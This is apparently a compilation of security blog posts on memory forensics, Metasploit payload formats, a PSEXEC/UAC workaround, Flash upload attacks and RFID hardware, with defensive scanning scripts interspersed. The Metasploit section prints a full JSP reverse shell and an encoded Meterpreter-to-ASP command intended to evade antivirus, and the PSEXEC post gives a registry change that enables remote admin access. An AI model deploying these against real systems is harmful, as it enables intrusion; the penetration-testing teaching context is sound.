
Memory Analysis


What am I talking about? I am talking about RAM!

Here are some of the things we can get from RAM: processes, network connections, open files, and encryption keys (BitLocker).

The last one, encryption keys from BitLocker, comes from an awesome presentation by Jesse Kornblum on how to recover the BitLocker keys from memory; check it out: http://jessekornblum.com/presentations/omfw08.pdf

There are some great tools for acquiring memory. You can use win32dd.exe, which creates a raw image file and also writes an MD5 hash of the output file you create.

My personal favorite, though, is Memoryze from Mandiant, available as a free download at http://www.mandiant.com. The cool thing about Memoryze is that you can run enumeration tools that give you process information, the registry keys in use by each process, which DLLs are loaded, which drivers are loaded in memory, and so on. The great thing is that you can do this either against an image Memoryze has acquired or against a live machine.

Here is how it works:

Open a command shell (cmd.exe) and change directories to where you installed Memoryze.

Type "MemoryDD.bat". It will create a directory called audits where it will put your memory image, or

To write the image to a specific directory, type "MemoryDD.bat -output <directory_name>".

[Screenshot: MemoryDD.bat output]

To identify all open ports, along with their processes and process IDs, type "Process.bat -ports true".

The output is written in XML format:

[Screenshot: Process.bat -ports true output]

Notice above that the process forcefield.exe, process ID 900, is making an outbound connection to IP address 68.142.101.68 on port 80. This is simply a great way to tell what process is doing what (e.g. malware making outbound connections).

Now suppose you wanted to look for rootkits in memory. You can use Mandiant's HookDetection.bat file, which executes RootkitAudit.Batch.xml. It identifies hooks in kernel memory that are often used to subvert the integrity of the system. Below you can see the different modules and how they relate to the kernel, drivers, etc.

[Screenshot: HookDetection.bat output]

Notice above that you can see the module that has hooks into the kernel, i.e. 1394BUS.sys, where it is located (\windows\system32\drivers\) and a description of it ("Driver").

If you had an unknown module with hooks into the kernel, you could find it here.

Now these are all great tools, but what do you do with a memory image once you have it? There are some basic techniques you can use for analysis. I would start with the "strings" command: run strings memory.img > memory.str. Then you can begin to parse the file for emails, websites surfed to (or connected to by malware), passwords, blogged text, and unknown executables.

Once you have your image, you might choose to use a tool called Volatility. This tool simply ROCKS!

Here is how it works on Linux:

    python volatility command -f /path_to_windows_memory_image

The keyword command refers to one of a series of commands you can choose from. Here is the list:

[Screenshot: volatility command list]

So what can we do with this? Let me show you. First, let's see what processes are running in memory.

First I type the command:

    python volatility pslist -f /path_to_image/imagefile.img

and I will see output like this:

[Screenshot: volatility pslist output]

Now you can see the executables running. You can also see from the second column what the PID (Process ID) is. So let's say we did not know what jusched.exe (PID 2228) was, we thought it might be malware, and we would like to send it to VirusTotal. Well then, let's grab it right out of memory:

    python volatility procdump -p 2228 -f /path_to_image/imagefile.img

[Screenshot: volatility procdump output]

Now we have carved that process out. However, to be sure we did this correctly, let's take a look at it using khexedit. Since this is supposed to be an .exe file, it should start off in hex with MZ.

So, on Linux:

    khexedit executable.2228.exe

[Screenshot: executable.2228.exe in khexedit]

We can see that it is in fact what we are looking for so we could now send this up to virus total, or look deeper into the file to see what it does.
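The same "does it start with MZ" check, done in code rather than by eye, as an added example (mine, not from the post or from Volatility): it also follows e_lfanew to the PE signature, reads the machine type, and hashes the blob so the value can be looked up before anything is uploaded. The sample PE header is constructed here.

```python
import hashlib
import struct
from typing import Any, Dict

# COFF machine types we care about when triaging a carved Windows process.
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64"}


def inspect_carved_pe(data: bytes) -> Dict[str, Any]:
    """Check a carved blob for the DOS 'MZ' stub and the 'PE\\0\\0' signature.

    Returns the facts a triage note would record. A carve whose first page was
    not resident in memory typically fails the MZ check; a carve truncated
    before the PE header passes MZ but fails PE.
    """
    result: Dict[str, Any] = {
        "mz": False, "pe": False, "machine": None,
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    # The DOS header is 0x40 bytes; e_lfanew sits at offset 0x3C.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    result["mz"] = True
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Need 4 bytes of signature plus the 2-byte Machine field after it.
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return result
    result["pe"] = True
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    result["machine"] = MACHINE_NAMES.get(machine, hex(machine))
    return result


def _build_sample() -> bytes:
    """Constructed minimal PE: DOS header, PE signature, COFF header, padding."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0)
    return bytes(dos) + coff + b"\0" * 16


SAMPLE_PE = _build_sample()

if __name__ == "__main__":
    print(inspect_carved_pe(SAMPLE_PE))
    print(inspect_carved_pe(b"\0" * 512))            # looks like a non-resident first page
```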

Well, that is it for memory in this post. As always: be good, be safe, hack legally and responsibly, and share the knowledge. I'm out.

Metasploit Payload Format Galore


There are now several flavors you can export your payloads in with Metasploit, making their insertion more and more flexible. If we use the msfpayload command alone, we can generate the following output buffers for the payloads:

  • Perl
  • Ruby
  • JavaScript
  • Executable
  • VBA
  • Raw

The output for the programming languages can be used in exploit code being developed or inserted into programs; Raw can be passed to msfencode for further processing; and Executable generates a single-file executable whose type and architecture depend on the payload. Currently executables can be created for the following OSes:

  • Windows (x86 and x64)
  • AIX (PPC)
  • Solaris (Sparc and x86)
  • Linux (Mips, PPC and x86)
  • OSX (ARM, PPC and Intel)
  • BSD (Sparc and x86)

To get a list of all payloads and their descriptions, just run msfpayload with the -h flag:

    ./msfpayload -h

        Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA>

    Framework Payloads (198 total)
    ==============================

        Name                                             Description
        ----                                             -----------
    ................
        java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
        java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell

    ................
        php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
        php/bind_php                                     Listen for a connection and spawn a command shell via php
        php/download_exec                                Download an EXE from a HTTP URL and execute it
        php/exec                                         Execute a single system command
        php/reverse_perl                                 Creates an interactive shell via perl
        php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
        php/shell_findsock
            Spawn a shell on the established connection to
            the webserver.  Unfortunately, this payload
            leaves conspicuous evil-looking entries in the
            apache error logs, so it is probably a good idea
            to use a bind or reverse shell unless firewalls
            prevent them from working.  The issue this
            payload takes advantage of (CLOEXEC flag not set
            on sockets) appears to have been patched on the
            Ubuntu version of Apache and may not work on
            other Debian-based distributions.  Only tested on
            Apache but it might work on other web servers
            that leak file descriptors to child processes.

If we take a look at the snippet of output shown above, you can see that several payloads are actually source code that can be placed on a web server for execution; the two types of payloads that allow this are Java JSP and PHP code. Just set the output to Raw and save the output to a file.

To get the list of options for a payload, use the Summary option:

    ./msfpayload java/jsp_shell_reverse_tcp S

           Name: Java JSP Command Shell, Reverse TCP Inline
        Version: 7550
       Platform: Windows, OSX, Linux, Unix, Solaris
           Arch: java
    Needs Admin: No
     Total size: 0
           Rank: Normal

    Provided by:
      sf <stephen_fewer@harmonysecurity.com>

    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The local address
    LPORT  4444             yes       The local port
    SHELL  cmd.exe          yes       The system shell to use.

    Description:
      Connect back to attacker and spawn a command shell

Let's generate a JSP file with some options so as to run it on a Windows server supporting JSP, such as an Oracle Application Server:

    ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.224,LPORT=8080 R > /tmp/reversejsp.jsp

If we now take a look at the code generated, it will look like this:

     1:
     2: <%@page import="java.lang.*"%>
     3: <%@page import="java.util.*"%>
     4: <%@page import="java.io.*"%>
     5: <%@page import="java.net.*"%>
     6:
     7: <%
     8:     class StreamConnector extends Thread
     9:     {
    10:         InputStream is;
    11:         OutputStream os;
    12:
    13:         StreamConnector( InputStream is, OutputStream os )
    14:         {
    15:             this.is = is;
    16:             this.os = os;
    17:         }
    18:
    19:         public void run()
    20:         {
    21:             BufferedReader in  = null;
    22:             BufferedWriter out = null;
    23:             try
    24:             {
    25:                 in  = new BufferedReader( new InputStreamReader( this.is ) );
    26:                 out = new BufferedWriter( new OutputStreamWriter( this.os ) );
    27:                 char buffer[] = new char[8192];
    28:                 int length;
    29:                 while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
    30:                 {
    31:                     out.write( buffer, 0, length );
    32:                     out.flush();
    33:                 }
    34:             } catch( Exception e ){}
    35:             try
    36:             {
    37:                 if( in != null )
    38:                     in.close();
    39:                 if( out != null )
    40:                     out.close();
    41:             } catch( Exception e ){}
    42:         }
    43:     }
    44:
    45:     try
    46:     {
    47:         Socket socket = new Socket( "192.168.1.224", 8080 );
    48:         Process process = Runtime.getRuntime().exec( "cmd.exe" );
    49:         ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    50:         ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
    51:     } catch( Exception e ) {}
    52: %>
    53:

As can be seen, lines 47 through 50 are the part that executes the cmd.exe command and pipes its input and output through a socket back to the attacker; the shell is also an option that can be changed to /bin/bash when targeting a Linux host.
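For the defender, the structure of lines 47 through 50 is also what gives such a page away on a web server. The following scanner is an added example (my code, not part of the post or of Metasploit) that flags JSP sources containing that same spawn-a-process, open-a-socket, bridge-the-streams shape; the indicator weights, threshold and the two sample pages are constructed for this example.

```python
import os
import re
from typing import Dict, List

# Weighted indicators drawn from the generated JSP above. Whitespace is
# tolerated inside each pattern so trivial reformatting does not evade the
# match. The weights are constructed for this example.
INDICATORS = {
    "process_exec": (re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\("), 3),
    "raw_socket": (re.compile(r"new\s+(?:java\.net\.)?(?:Server)?Socket\s*\("), 2),
    "stream_bridge": (re.compile(
        r"getInputStream\s*\(\s*\)[\s\S]*getOutputStream\s*\(\s*\)"), 1),
    "shell_binary": (re.compile(r"[\"'](?:cmd\.exe|/bin/(?:ba)?sh)[\"']"), 2),
}
THRESHOLD = 5   # process spawn plus a raw socket is enough to warrant a look


def scan_source(source: str) -> Dict[str, object]:
    """Score one JSP/Java source; 'suspicious' is True at or above THRESHOLD."""
    hits: List[str] = [name for name, (pat, _w) in INDICATORS.items() if pat.search(source)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {"score": score, "hits": hits, "suspicious": score >= THRESHOLD}


def scan_tree(root: str) -> Dict[str, Dict[str, object]]:
    """Scan every .jsp/.jspx under root and return findings for flagged files only."""
    findings: Dict[str, Dict[str, object]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jsp", ".jspx")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
                if result["suspicious"]:
                    findings[path] = result
    return findings


# Constructed samples: a stripped-down page with the same shape as the
# generated shell above (not a working payload) and a benign page that also
# touches the network.
SUSPECT_JSP = """<%@page import="java.io.*"%><%@page import="java.net.*"%>
<% Socket s = new Socket("203.0.113.5", 8080);
   Process p = Runtime . getRuntime ( ) . exec ("cmd.exe");
   bridge(p.getInputStream(), s.getOutputStream()); %>"""

BENIGN_JSP = """<%@page import="java.net.*"%>
<% URL u = new URL(request.getParameter("feed"));
   out.println(new String(u.openStream().readAllBytes())); %>"""

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_JSP), ("benign", BENIGN_JSP)):
        print(label, scan_source(src))
```

Run scan_tree against the web root on a schedule and diff the findings against the last run; a newly flagged file is the signal, not the score by itself.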

Now, if we want other formats not included in msfpayload, and we also want to obfuscate our payload by encoding it so as to make it more difficult for AV (Anti Virus) and HIPS (Host Intrusion Prevention Systems) to detect, we use the msfencode command:

    ./msfencode -h

        Usage: ./msfencode <options>

        -a <opt>  The architecture to encode as
        -b <opt>  The list of characters to avoid: '\x00\xff'
        -c <opt>  The number of times to encode the data
        -e <opt>  The encoder to use
        -h        Help banner
        -i <opt>  Encode the contents of the supplied file path
        -l        List available encoders
        -m <opt>  Specifies an additional module search path
        -n        Dump encoder information
        -o <opt>  The output file
        -p <opt>  The platform to encode for
        -s <opt>  The maximum size of the encoded data
        -t <opt>  The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs, asp)
        -x <opt>  Specify an alternate win32 executable template

By piping the Raw output to msfencode we can manipulate the payload even further; some of the most used options are the following:

  • -a for specifying the architecture (x86, x64).
  • -c to specify the number of encoding passes to do.
  • -e for the encoder to use.
  • -t for the format of the buffer.

There are different encoders, and they are ranked by their effectiveness; to get a list we use the -l option:

    ./msfencode -l

    Framework Encoders
    ==================

        Name                    Rank       Description
        ----                    ----       -----------
        cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
        cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
        generic/none            normal     The "none" Encoder
        mipsbe/longxor          normal     XOR Encoder
        mipsle/longxor          normal     XOR Encoder
        php/base64              normal     PHP Base64 encoder
        ppc/longxor             normal     PPC LongXOR Encoder
        ppc/longxor_tag         normal     PPC LongXOR Encoder
        sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
        x64/xor                 normal     XOR Encoder
        x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
        x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
        x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
        x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
        x86/countdown           normal     Single-byte XOR Countdown Encoder
        x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
        x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
        x86/nonalpha            low        Non-Alpha Encoder
        x86/nonupper            low        Non-Upper Encoder
        x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
        x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
        x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
The highest-ranked one for x86 code is x86/shikata_ga_nai. Do notice that, depending on the payload, you must be careful that the encoder and the architecture for which you are generating the payload match.

    In the format buffers we get the same as with msfpayload but we also get some very interesting ones like:


  • elf – ELF (Executable and Linking Format) binary executable for Linux systems
  • vbs – Visual Basic Script
  • loop-vbs – Visual Basic Script that will loop and re-execute every x seconds, as specified in the options
  • asp – Active Server Pages from Microsoft's .Net Framework

As can be seen, we have some very interesting options for outputting our code and delivering it to our targets.

Let's generate a Meterpreter payload, encode it several times and convert it to an ASP page:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.224,LPORT=993 R | ./msfencode -c 5 -e x86/shikata_ga_nai -a X86 -t asp > evilpage.asp
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5

Now this ASP page can be uploaded to a web server or placed inside the code of a valid ASP page through injection.

One important note: the more passes you encode with, the bigger the file gets, so keep that in mind if your delivery mechanism is sensitive to size.

    As it can be seen Metasploit gives a large set of formats to export our payloads thus giving greater flexibility on avenues of attack.

    Practical Kung Fu Webcast Series


    PaulDotCom is very excited to bring you several new webcast series starting next January. The webcasts will be produced, hosted, and performed by the members of PaulDotCom. In addition to the White Hat World webcasts, there will be several different topic-based webcasts that will highlight different areas of information security. The first two are sure to be a "smash hit" as we show you how to improve your skills in the areas of client-side penetration testing and web application assessments (and even avenge the death of your master). Information about each webcast, including the registration links, is below:


    Title: Practical Client-Side Exploitation Kung Fu

    Description: In this webcast we will explore the tools & techniques needed to perform successful client-side exploitation. Practical methods for information gathering, target selection, and exploit delivery will be covered.

    Date: Thursday, January 21, 2010

    Time: 2:00 PM - 3:00 PM EST

    Sponsor: Core Security Technologies

    Register Here: https://www1.gotomeeting.com/register/171250512


    Title: Practical Web Application Pen Testing Kung Fu

    Description: In this session John & Paul will guide you to performing more successful web application penetration testing. You will learn how to balance automated tools with manual testing, strike vulnerabilities with the highest chance of exploitation, and more!

    Date: Tuesday, January 26, 2010

    Time: 2:00 PM - 3:00 PM EST

    Sponsor: Cenzic

    Register Here: https://www1.gotomeeting.com/register/290940024

    Train Your Systems Administrators



One of the great eye-opening moments for me in the past few years was learning that we are outnumbered. Not only does it appear that there is a non-stop wave of malware and evil sites constantly trying to infect our systems, but it seems like our user population is working against us as well by trying to click on every evil link or evil file they come upon. Because of this it is very easy to feel like the plight of today's security professional is a grim one. I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is that we get to work in one of the coolest fields.

    If you don't think so….please get out. There are other people who would love to have your job.

    However, I have also realized recently that we are not alone. There is another group of professionals that we work with every day that can help us. Our Administrator brethren are an untapped resource for the information security community. We need to start cross-training with them if we want to stand a chance against the onslaught of attacks and malware that we face on a daily basis.

    There are a number of different ways to go about this. There are commercial training options for your systems administrators that are short and to the point. I will be teaching one of these classes online and another in New Orleans in January. Please see the below links for more information.

    564 online.

    564 in New Orleans with Mechanical Bull and Beads.


    However, beyond the commercial options there is something that we should be doing as well. I recommend having weekly brown bag meetings where you can show your systems administrators some cool tricks for ideating an incident and they can show you some neat tricks for understanding the business application process flow of your organization. This tradeoff is beneficial because it illuminates both aspects of an organization, security and day-to-day administration.

    Keep in mind that one of the greatest instructors of evil, the great Bastard Operator From Hell, was a Systems Administrator. There is much we can learn from them.

    So Much To Learn!

    -strandjs

    Why your Metasploit PSEXEC exploit might be failing


Have you had trouble using PSEXEC or other remote administrative tools on Windows Vista, Windows 7 and Windows 2008 servers? If so, UAC (User Account Control) might be preventing your tools from working. Windows UAC drops all of the Administrator privileges from the SAT (Security Access Token) for REMOTE connections that use LOCAL accounts. This restriction prevents all remote administrative functions such as connecting to administrative shares (C$, etc.), installing services or launching a new process (psexec).

In the scenario where Computer1 belongs to the PenTesterDomain and Computer2 belongs to WORKGROUP or the PentestCustomerDomain, Computer1 will not be able to connect to \\computer2\c$ or perform other administrative functions using the local administrator username and password on Computer2. Because UAC restricts the use of administrator privileges to interactive local sessions and to domain accounts, you will need to use a domain account.

If you're using Metasploit's psexec module you will need to specify the SMBDomain. This option doesn't appear when you type "show options", but it is available under the advanced options ("show advanced").

Once you've obtained some type of remote execution on the target host you can enable remote administrative functions by creating the following registry key:

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\LocalAccountTokenFilterPolicy

Create a DWORD entry at that location and set its value to 1.

    After the target machine has been rebooted you will be able to connect to the C$ share, launch PSEXEC and perform other administrative functions using the local accounts on the target system.
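From the defender's side, that value is worth auditing across the estate, because it is also what an intruder sets to get full-token remote access with local accounts. Below is an added example (my code, not from the post or from Metasploit) that reads a `reg export` of the Policies\System key and reports whether LocalAccountTokenFilterPolicy is 1; the exports are constructed here, and a real export is UTF-16 text that must be decoded before it is passed in.

```python
import re
from typing import Dict, Optional

TARGET_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
TARGET_VALUE = "LocalAccountTokenFilterPolicy"

KEY_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
DWORD_LINE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})\s*$')


def _normalize_key(key: str) -> str:
    """reg export writes HKEY_LOCAL_MACHINE; hand-written .reg files often use HKLM."""
    key = key.strip()
    if key.upper().startswith("HKLM\\"):
        key = "HKEY_LOCAL_MACHINE" + key[4:]
    return key.lower()


def read_token_filter_policy(reg_text: str) -> Optional[int]:
    """Return the DWORD under Policies\\System, or None when the value is absent."""
    in_target = False
    for line in reg_text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            in_target = _normalize_key(m.group("key")) == TARGET_KEY.lower()
            continue
        if in_target:
            d = DWORD_LINE.match(line)
            if d and d.group("name").lower() == TARGET_VALUE.lower():
                return int(d.group("hex"), 16)
    return None


def audit_token_filter(reg_text: str) -> Dict[str, object]:
    """Absent or 0 means UAC still filters remote local-account tokens (the default);
    1 means remote local admins get a full token, so C$ and service installs work."""
    value = read_token_filter_policy(reg_text)
    weakened = value == 1
    finding = ("LocalAccountTokenFilterPolicy=1: remote logons with local accounts get full admin tokens"
               if weakened else "default token filtering in effect for remote local-account logons")
    return {"value": value, "remote_local_admin_full_token": weakened, "finding": finding}


# Constructed exports in the layout `reg export` produces (after UTF-16 decoding).
HARDENED_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"EnableLUA"=dword:00000001
"""

WEAKENED_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"EnableLUA"=dword:00000001
"LocalAccountTokenFilterPolicy"=dword:00000001

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer]
"LocalAccountTokenFilterPolicy"=dword:00000000
"""

# Same value name under the wrong key must not count; HKLM abbreviation must.
ABBREVIATED_EXPORT = """[HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"LocalAccountTokenFilterPolicy"=dword:00000000
"""

if __name__ == "__main__":
    for label, export in (("hardened", HARDENED_EXPORT), ("weakened", WEAKENED_EXPORT)):
        print(label, audit_token_filter(export))
```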

    References:
    http://forum.strataframe.net/Attachment943.aspx
    http://blogs.msdn.com/vistacompatteam/archive/2006/09/22/766945.aspx

    Still think allowing users to upload files to your server is OK?

    There has been quite a bit of buzz surrounding the newest Flash attack. Please review this site for a quick write-up. I want to make it clear this attack vector is different than a remote vulnerability in Flash. This attack is focused on an individual uploading a flash file to a server and then having it execute when a user visits the site.

Adobe has a nice write-up outlining the issue and their initial response to the problem here. I really like the write-up and its quote of a core axiom of computer security: "If you allow a bad guy to upload programs to your web site, it's not your web site anymore." That is very true.

    However, in the article they re-state that the issue at hand is the Same Origin Policy issue. Mike Bailey of Foreground Security neatly breaks down where the Adobe response fails to completely address the issue here.

    The point he makes is Adobe draws similarities between Javascript and SWF files. He shows that this comparison has some very interesting limitations. First, simply uploading a .js file to a webserver does not mean the file can be executed. However, if someone were to upload a .swf file to the server it can be executed within the context of the server. Now… Here is where it gets interesting, if a user loads a .swf file to a server and changes the extension, it can still execute within the context of the server. Who thought this was a good idea?

His point is that the scenarios in which .swf files can be executed are far more pervasive than the .js counterparts that Adobe discusses.

    The reason this fascinates me is that it is outside the bounds of what penetration testers would normally look for in a web application. Because this attack vector is not a remote exploit, it does not get the buzz that it deserves. The point is that when we are testing we need to look for vulnerabilities and attacks that attackers would use. This attack vector is definitely in that category. Further, this is not something that is easily fixed with a patch.

There are two things we need to take from this. First, file upload attacks have to be in your arsenal. Second, from the defensive side, Adobe is right. As much as I would like to disagree with the technical aspects of their response to this vulnerability, they are correct. If you design your web infrastructure to allow file uploads and for those uploads to be executed, there are going to be serious security ramifications. What would be the alternative? Flash could try to fix their plugin to at least validate file extensions before executing, or possibly require the content-type headers in the HTML (not in the file) before executing the Flash, thus bringing it more in line with the JavaScript analogy they discussed in their write-up.

    Until they do (and I don't expect this to happen any time soon) we will have a new vector to test for in our engagements.
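Since the renamed-.swf case above defeats any check based on the file name, an upload handler has to look at the bytes. The following is an added example (my code, not from the post, Adobe or Foreground Security) that sniffs the real format from the leading bytes, refuses SWF content regardless of extension, and refuses any file whose content does not match what the name claims; the allow-list and sample files are constructed for this example.

```python
from typing import Dict, Optional, Tuple

# Leading bytes for the formats an image/document upload handler is likely to
# see. The three SWF signatures cover uncompressed (FWS), zlib-compressed (CWS)
# and LZMA-compressed (ZWS) Flash files.
MAGIC: Tuple[Tuple[bytes, str], ...] = (
    (b"FWS", "swf"), (b"CWS", "swf"), (b"ZWS", "swf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"GIF87a", "gif"), (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
)
ALLOWED = {"png", "jpg", "gif", "pdf"}   # constructed allow-list for this example
EXT_ALIASES = {"jpeg": "jpg"}


def sniff(data: bytes) -> Optional[str]:
    """Identify the real format from the leading bytes, ignoring the file name."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def check_upload(filename: str, data: bytes) -> Dict[str, object]:
    """Decide whether an upload may be stored, and why not if it may not."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = EXT_ALIASES.get(ext, ext)
    kind = sniff(data)
    if kind is None:
        reason = "unrecognised content"
    elif kind not in ALLOWED:
        # Catches logo.jpg that is really a CWS file: the name never decides.
        reason = f"{kind} is active content and is never accepted"
    elif kind != ext:
        reason = f"content is {kind} but the extension says .{ext or '(none)'}"
    else:
        reason = None
    return {"declared": ext, "sniffed": kind, "accepted": reason is None, "reason": reason}


# Constructed sample uploads (headers only; bodies are padding).
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\0" * 16
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\0" * 16
SWF_BYTES = b"CWS\x0a" + b"\0" * 16

if __name__ == "__main__":
    for name, blob in (("avatar.jpg", JPEG_BYTES), ("avatar.jpg", SWF_BYTES),
                       ("movie.swf", SWF_BYTES), ("photo.jpeg", PNG_BYTES)):
        print(name, check_upload(name, blob))
```

Serving accepted uploads from a separate host name keeps anything that still slips through out of the application's origin, which is the Same Origin Policy point the Adobe response leans on.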

    -strandjs



John Strand will be teaching SANS Network Penetration Testing in London from 11/30 to 12/6 2009, and SANS Hacker Techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.

    Metasploit 3.3 released!


    Get it here!

    There are a couple of very cool things in this release. First, there are now standalone installs for Windows and Linux. This is a nice feature in light of some of the recent conflicts between Ruby versions and the framework.

    Another feature that I like is the ability to embed Payloads into other .exe files. The OSVDB references are also very nice when it comes to report creating time. NX support in payloads will be a big help.

    There is quite a lot to review/take in. Check out the full release notes here.

    Be expecting a full review/discussion on our next show!!

    All I can say is bring on 3.4 dev!

    -strandjs

Let me start by saying that these are the opinions of a contributor. To this day I have contributed 3 Auxiliary Modules and 16 Meterpreter scripts to the project, and I had the honor and privilege to present with HD at Defcon 17 in the Metasploit Track. I was initially in shock when I saw the news on my iPhone while stuck in traffic; when I saw the news I could not believe it, I thought it was a joke. When I got to my office I quickly checked the web pages and listened to the Risky Business Podcast where they discussed the acquisition, and read all of the tweets of people in favor and against it, their worries, rants and comments. After all of this, as I mentioned, I came to the conclusion that this is a great thing for the project. For a long time this project has been the labor of love of the members of the Metasploit project, with very few active committers and submitters other than a handful, each putting in their own free time, sacrificing long nights, family time and money to work on the project. Some wrote code to scratch their own itch and solve problems they had; others just did it for the same motivation that has pushed hackers everywhere to write code, the fun of creating something and learning how stuff works. In my case I stopped doing penetration tests and security audits many years ago, and in December of last year decided to get back into the game by sharing stuff on my blog and in forums and turning a lot of the stuff I knew into tools and scripts; in that process I started writing code for Metasploit, and I never found in any other project a community so patient and willing to help. HD has given me tips that made me a better coder; he was always patient and courteous with me and other contributors, and the members of the team, like Natron, ET, Chris Gates and MC, have also always been helpful with each piece of code I wrote (which many times was ugly as hell).
HD is now a father, and as a dad also of a little girl I know how hard it is to spend time coding to contribute to a community and sacrifice the precious time one has with something as precious as one's own child; what he did will give him more time to spend with his family and still work on the project he loves, as well as for some of the members of the Metasploit team. Here is a list of the advantages I see:

1. Code will have a dedicated dev team to work on it.
2. More stable code base, since more resources for testing will be available.
3. More exploits and features to come faster, since there will be a dedicated team.
4. The side effect that other projects like Canvas, Core Impact and others will have a stronger competitor, thus making them improve their products even more.
5. Support for pentesters and others that use the framework.

The fears I have seen expressed by many have been:

1. The code going private and closed source.
2. That many of the cool features and exploits will be charged for by Rapid7.
3. That the community will disappear.

To this I answer: HD has put long hours and money into funding this project by himself; he has expressed that he will continue to keep the project open source as well as support the community, and to this I say he has more than earned our support and trust. I trust HD and hold him to his word. The project is under a BSD license, so the same community that has made Metasploit grow can fork it and keep it going, but for now my trust is in HD and the dev team. So let's keep supporting the project by contributing, testing the code, reporting bugs and making this an even better framework. I do say I envy HD and Egyp7 from the team; they are now working full time on what they love, so I say to them and the rest of the Metasploit team congratulations and my best wishes.

    What's in Larry's RFID hacking box?


    We've been asked a number of times for advice on RFID equipment that can be used to start experimenting with RFID technologies. We've heard your request loud and clear; I'm going to give you a rundown of what is in my current kit.

[Photo: the current RFID kit]

    Start at the Beginning

    The first reader that I picked up was the PhidgetRFID board.

[Photo: PhidgetRFID board]
It was inexpensive and included all the bits and pieces I needed for interfacing (USB built in), along with some sample applications and an open community. It reads uniquely numbered EM4x02 series tags quite well. This reader is read-only and operates in the 125 kHz spectrum.

    Moving On Up

    Shortly there after I realized that I wanted to write tags. Of course I was familiar with the RFIDIOt project and I wanted a writer that would work with that particular code. I picked up an ACG reader with USB interface from Major Malfunction (the author of RFIDIOt) in order to help support the project.

    ACG.jpg

    It was expensive and it needed to be imported to me from the UK but I couldn't find an equivalent reader elsewhere that could come close to the cost. I picked up the ACG LF USB reader, which works like a champ reading and writing to all manners of tags. If I had to do it again, I'd upgrade to the ACG LAHF USB which wasn't available at the time. While I was there, I also picked up the ultra cheap USB Keyboard Wedge Verification LF Reader just for fun.


